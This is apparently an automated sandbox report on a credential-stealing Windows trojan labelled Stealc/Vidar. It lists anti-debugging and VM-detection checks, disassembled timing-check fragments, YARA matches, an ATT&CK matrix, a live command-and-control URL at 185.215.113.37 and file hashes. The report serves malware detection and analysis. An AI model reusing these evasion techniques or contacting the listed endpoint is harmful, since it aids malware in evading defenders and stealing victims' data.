                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A32A2 second address: 13A3308 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5CB8E48998h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007F5CB8E489A8h 0x00000011 nop 0x00000012 movsx edx, si 0x00000015 push 00000004h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F5CB8E48998h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 xor dx, 9D9Bh 0x00000036 push ABFFCCACh 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F5CB8E4899Fh 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A3308 second address: 13A330C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A7EF8 second address: 13A7EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A7EFE second address: 13A7F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A7F06 second address: 13A7F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4899Fh 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A7F1A second address: 13A7F21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED02FD second address: 4ED0349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, ax 0x00000007 popad 0x00000008 pushfd 0x00000009 jmp 00007F5CB8E489A2h 0x0000000e xor esi, 58FE8F58h 0x00000014 jmp 00007F5CB8E4899Bh 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F5CB8E489A6h 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0349 second address: 4ED034D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED034D second address: 4ED0353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0353 second address: 4ED0359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0359 second address: 4ED035D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED035D second address: 4ED03C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F5CB8E4DDA3h 0x00000010 or si, 482Eh 0x00000015 jmp 00007F5CB8E4DDA9h 0x0000001a popfd 0x0000001b push esi 0x0000001c mov edi, 62B92742h 0x00000021 pop ebx 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 jmp 00007F5CB8E4DDA6h 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F5CB8E4DD9Ah 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED03C9 second address: 4ED03D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4899Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1111B82 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 110F4EE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1347C3F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00EC38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00EC4910
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_00EBDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00EBE430
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00EC4570
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_00EBED20
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00EB16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00EC3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00EBF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_00EBBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00EBDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB1160 GetSystemInfo,ExitProcess,1_2_00EB1160
                Source: file.exe, file.exe, 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exeBinary or memory string: hGfS'
                Source: file.exe, 00000001.00000002.1705510345.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000001.00000002.1705510345.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1705510345.0000000000AF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000001.00000002.1705510345.0000000000AF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                Source: file.exe, 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13588
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13585
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13605
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13600
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13639
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB45C0 VirtualProtect ?,00000004,00000100,000000001_2_00EB45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00EC9860
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC9750 mov eax, dword ptr fs:[00000030h]1_2_00EC9750
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,1_2_00EC78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7008, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00EC9600
                Source: file.exe, file.exe, 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: di.EProgram Manager
                Source: file.exe, 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: odi.EProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00EC7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,1_2_00EC7980
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_00EC7850
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_00EC7A30

                Stealing of Sensitive Information

                Source: Yara matchFile source: 1.2.file.exe.eb0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1705510345.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1656947886.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7008, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara matchFile source: 1.2.file.exe.eb0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1705510345.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1656947886.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7008, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                MITRE ATT&CK matrix (numbers in parentheses are the counts shown in the report for that technique):

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | DLL Side-Loading (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Native API (11) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (33) | LSASS Memory | Security Software Discovery (641) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (33) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (12) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (324) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label
file.exe | 47% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML | -
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                No contacted domains info
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown

URLs found in memory strings
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/a | file.exe, 00000001.00000002.1705510345.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37 | file.exe, 00000001.00000002.1705510345.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php? | file.exe, 00000001.00000002.1705510345.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37/e2b1563c6670f193.phph | file.exe, 00000001.00000002.1705510345.0000000000AF4000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37/e2b1563c6670f193.phpG | file.exe, 00000001.00000002.1705510345.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37so | file.exe, 00000001.00000002.1705510345.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1538495
                          Start date and time:2024-10-21 13:08:37 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 31s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:6
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 87
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: file.exe
                          No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
No context
                          No context
                          No created / dropped files found
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.946306853072789
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'856'000 bytes
                          MD5:23b93e56b64c319ccc5f1754135ebd10
                          SHA1:618c1cc4b62e2ef7ec0af6462a180910e6ffe973
                          SHA256:f0c4061792e560aa59a73574ea3824945a4394298bf2b9ad3e5b494e233c9790
                          SHA512:6f466ca15421b6e7ffa2f83c0bebb524199cc0a961744ecc6b7a648a03ad8a20cd429d0983375138157196f314fc65b46d915c10466f08307a582eb9493aab6e
                          SSDEEP:24576:KfhokCGLNusYygEaRJIRprVltfYoIUytYRmJchkzc5yd+0HQXWezJS+RvwXiMx1:shokJVqErNBfOUyCROcdEdIJxR2i4
                          TLSH:118533B46EA6FEBAC5C41930B20AEE56F17BEB5154A55BD00CEC01F763870E161F7884
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0xaa1000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction (disassembly at the entry point; after the first jump the bytes are almost entirely 00 00, which decodes as "add byte ptr [eax], al", so repeated runs are collapsed with a count):
jmp 00007F5CB88E77AAh
wrmsr
sbb al, 00h
add byte ptr [eax], al   (x2)
jmp 00007F5CB88E97A5h
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al   (x2)
add byte ptr [eax], dh
add byte ptr [eax], al   (x11)
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al   (x62)
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al   (x2)
adc byte ptr [eax], al
add byte ptr [eax], al   (x3)
or ecx, dword ptr [edx]
add byte ptr [eax], al   (x3)
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | d443f9a61bae37bd04d13ee9bb24c71e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x2a3000 | 0x200 | 4f1097dbf1cfcf30ec2a49ec647af720 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qmrtgfvc | 0x501000 | 0x19f000 | 0x19f000 | 9cbf4d1676127445f52bbccf7449b469 | False | 0.9948942253388554 | data | 7.95313047636981 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
elheadqd | 0x6a0000 | 0x1000 | 0x400 | 388db2877000f20df6049b3a1bd5eaa3 | False | 0.744140625 | data | 5.861942455554407 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
